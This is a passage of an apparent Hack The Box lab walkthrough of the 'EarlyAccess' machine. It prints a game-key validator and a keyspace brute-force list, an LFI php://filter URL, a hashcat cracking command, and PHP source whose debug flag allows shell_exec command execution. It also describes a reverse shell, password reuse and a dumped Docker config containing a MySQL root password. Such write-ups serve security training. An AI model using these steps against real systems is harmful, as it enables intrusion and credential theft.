          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
